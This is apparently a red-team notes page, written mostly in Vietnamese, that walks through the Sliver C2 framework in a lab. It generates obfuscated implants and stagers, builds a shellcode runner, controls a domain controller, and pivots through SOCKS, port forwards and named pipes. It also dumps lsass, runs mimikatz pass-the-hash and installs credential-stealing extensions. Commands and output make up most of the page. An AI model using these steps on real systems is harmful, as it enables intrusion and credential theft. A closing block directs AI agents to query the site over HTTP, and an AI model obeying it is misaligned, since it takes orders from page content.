# Sliver ## Refer {% embed url="?" %} {% embed url="" %} ## Setup ### Auto install ```bash sudo apt-get install build-essential mingw-w64 binutils-mingw-w64 g++-mingw-w64 curl https://sliver.sh/install|sudo bash ``` ### Start silver server ```bash systemctl start sliver systemctl status sliver ``` Config [authen](https://dominicbreuker.com/post/learning_sliver_c2_01_installation/) ### Connect with client ```bash └─$ sliver Connecting to localhost:31337 ... .------..------..------..------..------..------. |S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. | | :/\: || :/\: || (\/) || :(): || (\/) || :(): | | :\/: || (__) || :\/: || ()() || :\/: || ()() | | '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R| `------'`------'`------'`------'`------'`------' All hackers gain dash [*] Server v1.5.42 - 85b0e870d05ec47184958dbcb871ddee2eb9e3df [*] Welcome to the sliver shell, please type 'help' for options [*] Check for updates with the 'update' command sliver > ``` ## Beacons and Sessions Trong Sliver thì C2 agent được gọi là `implant` Sliver hỡ trợ 2 mode implant là beacons và sessions {% hint style="info" %} Tham khảo: Sliver implants in v1.5 and later support two modes of operation: "beacon mode" and "session mode." Beacon mode implements an asynchronous communication style where the implant periodically checks in with the server retrieves tasks, executes them, and returns the results. In "session mode" the implant will create an interactive real time session using either a persistent connection or using long polling depending on the underlying C2 protocol. {% endhint %} Hiểu đơn giản thì beacon mode giống beacon Cobalt Strike còn session mode thì giống Metasploit ### Generate session implant ```bash sliver > generate --mtls --os windows --arch amd64 --format exe --save /tmp/shell.exe [*] Generating new windows/amd64 implant binary [*] Symbol obfuscation is enabled [*] Build completed in 44s [*] Implant saved to /tmp/shell.exe ``` Start mtls listner ```bash sliver > mtls [*] Starting mTLS listener ... [*] Successfully started job #1 sliver > jobs ID Name Protocol Port Stage Profile ==== ====== ========== ====== =============== 1 mtls tcp 8888 sliver > ``` Tương tác với sessions ```bash [*] Session bb86e5a5 DIGITAL_ATTENTION - 192.168.179.11:59818 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 22:59:29 EST sliver > sessions ID Name Transport Remote Address Hostname Username Operating System Locale Last Message Health ========== =================== =========== ====================== ================== ========================= ================== ======== ======================================== ========= bb86e5a5 DIGITAL_ATTENTION mtls 192.168.179.11:59818 DomainController ENDY-COMP\administrator windows/amd64 en-US Sat Dec 21 22:59:29 EST 2024 (23s ago) [ALIVE] sliver > use ? Select a session or beacon: SESSION bb86e5a5 DIGITAL_ATTENTION 192.168.179.11:59818 DomainController ENDY-COMP\administrator windows/amd64 [*] Active session DIGITAL_ATTENTION (bb86e5a5-82e0-4562-80db-02dab7f3e0d9) sliver (DIGITAL_ATTENTION) > info Session ID: bb86e5a5-82e0-4562-80db-02dab7f3e0d9 Name: DIGITAL_ATTENTION Hostname: DomainController UUID: 6d114d56-3846-0706-4bad-06bcafa25169 Username: ENDY-COMP\administrator UID: S-1-5-21-3689512688-2841538555-566222747-500 GID: S-1-5-21-3689512688-2841538555-566222747-513 PID: 5468 OS: windows Version: Server 2016 build 14393 x86_64 Locale: en-US Arch: amd64 Active C2: mtls://192.168.179.132:8888 Remote Address: 192.168.179.11:59818 Proxy URL: Reconnect Interval: 1m0s First Contact: Sat Dec 21 22:59:29 EST 2024 (1m44s ago) Last Checkin: Sat Dec 21 22:59:29 EST 2024 (1m44s ago) ``` Exit ```bash sliver (DIGITAL_ATTENTION) > background [*] Background ... sliver > sessions ID Name Transport Remote Address Hostname Username Operating System Locale Last Message Health ========== =================== =========== ====================== ================== ========================= ================== ======== ========================================= ========= 75da56b4 DIGITAL_ATTENTION mtls 192.168.179.11:59853 DomainController ENDY-COMP\administrator windows/amd64 en-US Sat Dec 21 23:03:57 EST 2024 (1m4s ago) [ALIVE] sliver > sessions -k 75da56b4 [!] Lost session 75da56b4 DIGITAL_ATTENTION - 192.168.179.11:59853 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 23:05:21 EST sliver > ``` ### Generate beacon implant ```bash sliver > generate beacon --mtls 192.168.179.132 --os windows --arch amd64 --format exe --save /tmp/beacon.exe --seconds 5 --jitter 3 [*] Generating new windows/amd64 beacon implant binary (5s) [*] Symbol obfuscation is enabled [*] Build completed in 29s [*] Implant saved to /tmp/beacon.exe ``` Tương tác với beacons ```bash [*] Beacon be2fe170 DETERMINED_JUNKET - 192.168.179.11:59885 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 23:10:34 EST sliver > beacons ID Name Tasks Transport Remote Address Hostname Username Operating System Locale Last Check-In Next Check-In ========== =================== ======= =========== ====================== ================== ========================= ================== ======== ======================================= ====================================== be2fe170 DETERMINED_JUNKET 0/0 mtls 192.168.179.11:59885 DomainController ENDY-COMP\administrator windows/amd64 en-US Sat Dec 21 23:10:47 EST 2024 (3s ago) Sat Dec 21 23:10:52 EST 2024 (in 2s) sliver > use ? Select a session or beacon: BEACON be2fe170 DETERMINED_JUNKET 192.168.179.11:59885 DomainController ENDY-COMP\administrator windows/amd64 [*] Active beacon DETERMINED_JUNKET (be2fe170-f919-47fe-8c3d-9ed9fb54ee99) sliver (DETERMINED_JUNKET) > info Beacon ID: be2fe170-f919-47fe-8c3d-9ed9fb54ee99 Name: DETERMINED_JUNKET Hostname: DomainController UUID: 6d114d56-3846-0706-4bad-06bcafa25169 Username: ENDY-COMP\administrator UID: S-1-5-21-3689512688-2841538555-566222747-500 GID: S-1-5-21-3689512688-2841538555-566222747-513 PID: 5484 OS: windows Version: Server 2016 build 14393 x86_64 Locale: en-US Arch: amd64 Active C2: mtls://192.168.179.132:8888 Remote Address: 192.168.179.11:59885 Proxy URL: Interval: 5s Jitter: 3s First Contact: Sat Dec 21 23:10:34 EST 2024 (24s ago) Last Checkin: Sat Dec 21 23:10:53 EST 2024 (5s ago) Next Checkin: Sat Dec 21 23:10:58 EST 2024 (0s ago) sliver (DETERMINED_JUNKET) > ``` Check tasks ``` sliver (DETERMINED_JUNKET) > tasks ID State Message Type Created Sent Completed ========== =========== ============== =============================== =============================== =============================== 2b2aec2f completed Screenshot Sat, 21 Dec 2024 23:12:08 EST Sat, 21 Dec 2024 23:12:12 EST Sat, 21 Dec 2024 23:12:12 EST 9ecc207b completed Execute Sat, 21 Dec 2024 23:12:04 EST Sat, 21 Dec 2024 23:12:06 EST Sat, 21 Dec 2024 23:12:06 EST ``` Đổi config beacons ```bash sliver (DETERMINED_JUNKET) > reconfig -i 5s -j 1s [*] Tasked beacon DETERMINED_JUNKET (428cea99) [+] DETERMINED_JUNKET completed task 428cea99 [*] Reconfigured beacon ``` Chuyển beacons thành sessions ```bash sliver (DETERMINED_JUNKET) > interactive [*] Using beacon's active C2 endpoint: mtls://192.168.179.132:8888 [*] Tasked beacon DETERMINED_JUNKET (51e7cb02) [*] Session caee6edb DETERMINED_JUNKET - 192.168.179.11:59967 (DomainController) - windows/amd64 - Sat, 21 Dec 2024 23:17:21 EST sliver (DETERMINED_JUNKET) > ``` Có thể chuyển sesion với protocol khác ```bash sliver > interactive --help Task a beacon to open an interactive session (Beacon only) Usage: ====== interactive [flags] Flags: ====== -d, --delay string delay opening the session (after checkin) for a given period of time (default: 0s) -n, --dns string dns connection strings -h, --help display help -b, --http string http(s) connection strings -m, --mtls string mtls connection strings -p, --named-pipe string namedpipe connection strings -i, --tcp-pivot string tcppivot connection strings -t, --timeout int command timeout in seconds (default: 60) -g, --wg string wg connection strings ``` {% hint style="info" %} * Beacons thì có thể chuyển thành sesson như session thì không thể chuyển thành beacon * Một cố command như `shell` và `portfwd` thì chỉ hoạt động với sessions {% endhint %} ## Profiles Tạo profiles để generate cho nhanh Profiles session ```bash sliver > profiles new --mtls 192.168.179.132 --os windows --arch amd64 --format exe session_win_default [*] Saved new implant profile session_win_default sliver > profiles Profile Name Implant Type Platform Command & Control Debug Format Obfuscation Limitations ===================== ============== =============== ================================= ======= ============ ============= ============= session_win_default session windows/amd64 [1] mtls://192.168.179.132:8888 false EXECUTABLE enabled sliver > profiles generate --save /tmp/shell.exe session_win_default [*] Generating new windows/amd64 implant binary [*] Symbol obfuscation is enabled [*] Build completed in 24s [*] Implant saved to /tmp/shell.exe sliver > profiles new beacon --mtls 192.168.179.132 --os windows --arch amd64 --format exe --seconds 5 --jitter 3 beacon_win_default [*] Saved new implant profile (beacon) beacon_win_default ``` Profile beacon ```bash sliver > profiles new beacon --mtls 192.168.179.132 --os windows --arch amd64 --format exe --seconds 5 --jitter 3 beacon_win_default [*] Saved new implant profile (beacon) beacon_win_default sliver > profiles Profile Name Implant Type Platform Command & Control Debug Format Obfuscation Limitations ===================== ============== =============== ================================= ======= ============ ============= ============= beacon_win_default beacon windows/amd64 [1] mtls://192.168.179.132:8888 false EXECUTABLE enabled session_win_default session windows/amd64 [1] mtls://192.168.179.132:8888 false EXECUTABLE enabled sliver > profiles generate --save /tmp/beacon.exe beacon_win_default [*] Generating new windows/amd64 beacon implant binary (5s) [*] Symbol obfuscation is enabled [*] Build completed in 26s ? Overwrite existing file? Yes [*] Implant saved to /tmp/beacon.exe ``` Get danh sách các implants ``` sliver > implants Name Implant Type Template OS/Arch Format Command & Control Debug =================== ============== ========== =============== ============ ================================= ======= DETERMINED_JUNKET beacon sliver windows/amd64 EXECUTABLE [1] mtls://192.168.179.132:8888 false DIGITAL_ATTENTION session sliver windows/amd64 EXECUTABLE [1] mtls://192.168.179.132:8888 false EASY_BROOM session sliver windows/amd64 EXECUTABLE [1] mtls://192.168.179.132:8888 false FRESH_AUDIENCE beacon sliver windows/amd64 EXECUTABLE [1] mtls://192.168.179.132:8888 false TALL_POST beacon sliver windows/amd64 EXECUTABLE [1] mtls://192.168.122.111:8888 false ``` Xóa implants ``` sliver > implants rm TALL_POST ? Remove 'TALL_POST' build? Yes ``` ## Stager Tạo stager đầu tiên cần tạo 1 profile với format shellcode ``` sliver > profiles new --http 192.168.179.132 --format shellcode win-shellcode [*] Saved new implant profile win-shellcode ``` Tạo listener ```bash sliver > https [*] Starting HTTPS :443 listener ... [*] Successfully started job #1 sliver > jobs ID Name Protocol Port Stage Profile ==== ======= ========== ====== =============== 1 https tcp 443 ``` Tạo stage-listener cho profile để delivery payload. Nhớ thêm prepend-size ```bash sliver > stage-listener --url http://192.168.179.132:1234 --profile win-shellcode --prepend-size [*] No builds found for profile win-shellcode, generating a new one [*] Sliver name for profile win-shellcode: UNNECESSARY_DICTAPHONE [*] Job 8 (http) started sliver > jobs ID Name Protocol Port Stage Profile ==== ======= ========== ====== ===================================================== 7 https tcp 443 8 http tcp 1234 win-shellcode (Sliver name: UNNECESSARY_DICTAPHONE) ``` Gen payload để load stager bằng msfvenom. Lưu ý dùng shell custom mới ăn còn dùng meterpreter thì không ăn ```bash msfvenom --payload windows/x64/custom/reverse_winhttp LHOST=192.168.179.132 LPORT=1234 LURI=/hello.woff --format exe --out /tmp/stager.exe ``` Hoặc có thể gen ra format c rồi dùng code sau để load ```c #include "windows.h" int main() { unsigned char shellcode[] = "\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52" "\x48\x31\xd2\x51\x56\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" ... "\xff\xff\xff\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xb4\x41" "\xff\xe7\x58\x6a\x00\x59\xbb\xe0\x1d\x2a\x0a\x41\x89\xda\xff" "\xd5"; void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memcpy(exec, shellcode, sizeof shellcode); ((void(*)())exec)(); return 0; } ``` Compile ```bash x86_64-w64-mingw32-gcc -o shellrunner.exe shellrunner.c ``` Sau khi kích file thì phải đợi 5-10s sau mới có sessions về (đôi khi nó về sesions nhưng không có alert nên cứ check sessions cho chắc) ## Execute Assembly Sliver cho phép thực thi .net assembly tương tự như Cobalt Strike. ```bash sliver (BROKEN_LIQUID) > execute-assembly /home/kali/tools/Ghostpack-CompiledBinaries/Seatbelt.exe [*] Output: %&&@@@&& &&&&&&&%%%, #&&@@@@@@%%%%%%###############% &%& %&%% &////(((&%%%%%#%################//((((###%%%%%%%%%%%%%%% %%%%%%%%%%%######%%%#%%####% &%%**# @////(((&%%%%%%######################((((((((((((((((((( #%#%%%%%%%#######%#%%####### %&%,,,,,,,,,,,,,,,, @////(((&%%%%%#%#####################((((((((((((((((((( #%#%%%%%%#####%%#%#%%####### %%%,,,,,, ,,. ,, @////(((&%%%%%%%######################(#(((#(#(((((((((( #####%%%#################### &%%...... ... .. @////(((&%%%%%%%###############%######((#(#(####(((((((( #######%##########%######### %%%...... ... .. @////(((&%%%%%#########################(#(#######((##### ###%##%%#################### &%%............... @////(((&%%%%%%%%##############%#######(#########((##### #####%###################### %%%.. @////(((&%%%%%%%################ &%& %%%%% Seatbelt %////(((&%%%%%%%%#############* &%%&&&%%%%% v1.2.1 ,(((&%%%%%%%%%%%%%%%%%, #%%%%##, ERROR: Error running command "" [*] Completed collection in 0.006 seconds ``` ## Socks and Portfwd ### Socks5 ```bash sliver (BROKEN_LIQUID) > socks5 --help In-band SOCKS5 Proxy Usage: ====== socks5 [flags] Flags: ====== -h, --help display help -t, --timeout int router timeout in seconds (default: 60) Sub Commands: ============= start Start an in-band SOCKS5 proxy stop Stop a SOCKS5 proxy sliver (BROKEN_LIQUID) > socks5 start [*] Started SOCKS5 127.0.0.1 1081 ⚠ In-band SOCKS proxies can be a little unstable depending on protocol sliver (BROKEN_LIQUID) > socks5 ID Session ID Bind Address Username Passwords ==== ====================================== ================ ========== =========== 1 762b70da-f0db-4d20-ada9-a155f4a1ce7d 127.0.0.1:1081 sliver (BROKEN_LIQUID) > socks5 stop -i 1 [*] Removed socks5 sliver (BROKEN_LIQUID) > ``` Theo cảm nhận của mình thì độ stable không ngon bằng Cobalt Strike lắm ### Portfwd ```bash sliver (SPICY_JAW) > portfwd --help In-band TCP port forwarding Usage: ====== portfwd [flags] Flags: ====== -h, --help display help -t, --timeout int command timeout in seconds (default: 60) Sub Commands: ============= add Create a new port forwarding tunnel rm Remove a port forwarding tunnel sliver (SPICY_JAW) > portfwd add -b 127.0.0.1:9999 -r 192.168.17.138:445 [*] Port forwarding 127.0.0.1:9999 -> 192.168.17.138:445 ``` Bind port 9999 tại local với port 445 tại 192.168.17.138 Remove portfw ```bash sliver (SPICY_JAW) > portfwd ID Session ID Bind Address Remote Address ==== ====================================== ================ ==================== 1 b0653816-faa9-4975-b28b-92165d4a6085 127.0.0.1:9999 192.168.17.138:445 sliver (SPICY_JAW) > portfwd rm -i 1 [*] Removed portfwd ``` ## Pivot {% hint style="info" %} Pivot chỉ dùng được với sesions còn beacons thì không {% endhint %} ### TCP Pivot Tạo tcp pivots trên sesons ```bash sliver (BROKEN_LIQUID) > pivots tcp [*] Started tcp pivot listener :9898 with id 1 sliver (BROKEN_LIQUID) > pivots ID Protocol Bind Address Number Of Pivots ==== ========== ============== ================== 1 TCP :9898 0 sliver (BROKEN_LIQUID) > ``` Gen shell để call về C2 ```bash sliver > generate --tcp-pivot 192.168.17.137:9898 --os windows --arch amd64 --format exe --save /tmp/pivot.exe [*] Generating new windows/amd64 implant binary [*] Symbol obfuscation is enabled [*] Build completed in 30s [*] Implant saved to /tmp/pivot.exe ``` Với ip ở đây sẽ là IP của sessions mà có thể giao tiếp với target. Up hàng lên máy target rồi kích hoạt ta sẽ có được sesions qua đường tunnel TCP
### SMB Pivot Start namepipe trên session 
sliver > use 982155fd

[*] Active session BROKEN_LIQUID (982155fd-407a-434b-8686-e4af57c1f295)

sliver (BROKEN_LIQUID) > pivots named-pipe --bind foobar

[*] Started named pipe pivot listener \\.\pipe\foobar with id 2
Gen shell để call về C2 ```bash sliver > generate --named-pipe 192.168.17.137/pipe/foobar --os windows --arch amd64 --format exe --save /tmp/pivot.exe [*] Generating new windows/amd64 implant binary [*] Symbol obfuscation is enabled [*] Build completed in 34s ? Overwrite existing file? Yes [*] Implant saved to /tmp/pivot.exe ``` Tương tự trên thì IP cũng là IP của sessions mà có thể giao tiếp với target. Kết quả:
Stop pivot ```bash sliver (BROKEN_LIQUID) > pivots stop -i 1 [*] Stopped pivot listener ``` ## Operator ### Rename sessions 
sliver > sessions

 ID         Name               Transport   Remote Address          Hostname   Username                  Operating System   Locale   Last Message                            Health  
========== ================== =========== ======================= ========== ========================= ================== ======== ======================================= =========
 0456ae36   BEAUTIFUL_REPORT   http(s)     192.168.179.137:49870   WinA       ENDY-COMP\administrator   windows/amd64      en-US    Sat Jan  4 22:50:55 EST 2025 (2s ago)   [ALIVE] 

sliver > use 0456ae36

[*] Active session BEAUTIFUL_REPORT (0456ae36-c402-45b7-b111-8f83916b3048)

sliver (BEAUTIFUL_REPORT) > rename -n WinA

[*] Renamed implant to WinA

sliver > sessions 

 ID         Name   Transport   Remote Address          Hostname   Username                  Operating System   Locale   Last Message                            Health  
========== ====== =========== ======================= ========== ========================= ================== ======== ======================================= =========
 0456ae36   WinA   http(s)     192.168.179.137:49870   WinA       ENDY-COMP\administrator   windows/amd64      en-US    Sat Jan  4 23:06:52 EST 2025 (1s ago)   [ALIVE] 

sliver >
### Upload / Download ``` sliver (WinA) > download desktop.ini /home/kali/test [*] Wrote 282 bytes (1 file successfully, 0 files unsuccessfully) to /home/kali/test sliver (WinA) > upload /home/kali/test test [*] Wrote file to C:\Users\Administrator\Desktop\test ``` ### Shell ```bash sliver (BEAUTIFUL_REPORT) > shell ? This action is bad OPSEC, are you an adult? Yes [*] Wait approximately 10 seconds after exit, and press to continue [*] Opening shell tunnel (EOF to exit) ... [*] Started remote shell with pid 2844 PS C:\Users\Administrator\Desktop> Shell exited sliver (BEAUTIFUL_REPORT) > ``` Nhấn `Ctrl+D` để exit ### Execute có output ```bash sliver (WinA) > execute -o whoami /all [*] Output: USER INFORMATION ---------------- User Name SID ================== =========================================== wina\administrator S-1-5-21-2122276757-511757396-437061769-500 GROUP INFORMATION ----------------- Group Name Type SID Attributes ============================================================= ================ ============ =============================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Mandatory group, Enabled by default, Enabled group BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288 ``` ### Make token 
sliver (WinA) > ls \\\\192.168.17.138\\Share

\\192.168.17.138\ (0 items, 0 B)
================================


sliver (WinA) > make-token -u userB -p Password123 -d .


[*] Successfully impersonated .\userB. Use `rev2self` to revert to your previous token.
sliver (WinA) > ls \\\\192.168.17.138\\Share

\\192.168.17.138\Share\ (1 item, 0 B)
=====================================
-rw-rw-rw-  123.txt  0 B  Sat Jan 04 21:48:13 -0800 2025


sliver (WinA) >
Dùng `rev2self` để clear token ### Pass the hash ```bash sliver (LOVELY_STAR) > upload /home/kali/tools/mimikatz/x64/mimikatz.exe mimikatz.exe [*] Wrote file to C:\Users\Administrator\Desktop\mimikatz.exe sliver (LOVELY_STAR) > execute -o mimikatz.exe "privilege::debug" "sekurlsa::pth /user:userB /domain:. /ntlm:58a478135a93ac3bf058a5ea0e8fdb71 /run:\"powershell -w hidden\"" "exit" [*] Output: .#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz(commandline) # privilege::debug Privilege '20' OK mimikatz(commandline) # sekurlsa::pth /user:userB /domain:. /ntlm:58a478135a93ac3bf058a5ea0e8fdb71 /run:"powershell -w hidden" user : userB domain : . program : powershell -w hidden impers. : no NTLM : 58a478135a93ac3bf058a5ea0e8fdb71 | PID 3048 | TID 1900 | LSA Process is now R/W | LUID 0 ; 2745069 (00000000:0029e2ed) \_ msv1_0 - data copy @ 000001E1308E1CF0 : OK ! \_ kerberos - data copy @ 000001E12FD0DB98 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 000001E12FD3A208 (32) -> null mimikatz(commandline) # exit Bye! ``` ### Dump process ```bash sliver (WinA) > procdump --pid 672 --save lsass.dmp [*] Process dump stored in: lsass.dmp ``` minidump lsa ```bash ┌──(kali㉿kali)-[~] └─$ pypykatz lsa minidump lsass.dmp INFO:pypykatz:Parsing file lsass.dmp FILE: ======== lsass.dmp ======= == LogonSession == authentication_id 113459 (1bb33) session_id 0 username ANONYMOUS LOGON domainname NT AUTHORITY logon_server logon_time 2025-01-05T07:49:38.007112+00:00 sid S-1-5-7 luid 113459 .... ``` ### Side load ```bash sliver (WinA) > sideload /home/kali/tools/mimikatz/x64/mimikatz.exe "privilege::debug" "exit" [*] Output: .#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz(commandline) # privilege::debug Privilege '20' OK mimikatz(commandline) # exit Bye! ``` ## Amory amory là extension package manager của sliver, cho phép ta download thêm package ```bash sliver > armory ``` Install package ```bash sliver > armory install windows-credentials [*] Installing extension 'coff-loader' (v1.0.14) ... done! [*] Installing extension 'nanodump' (v0.0.5) ... done! [*] Installing extension 'credman' (v1.0.7) ... done! [*] Installing extension 'chromiumkeydump' (v0.0.2) ... done! [*] Installing extension 'handlekatz' (v0.0.1) ... done! [*] Installing extension 'mimikatz' (v0.0.1) ... done! ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://endy.gitbook.io/endys-notes/red-teaming/c2/sliver.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.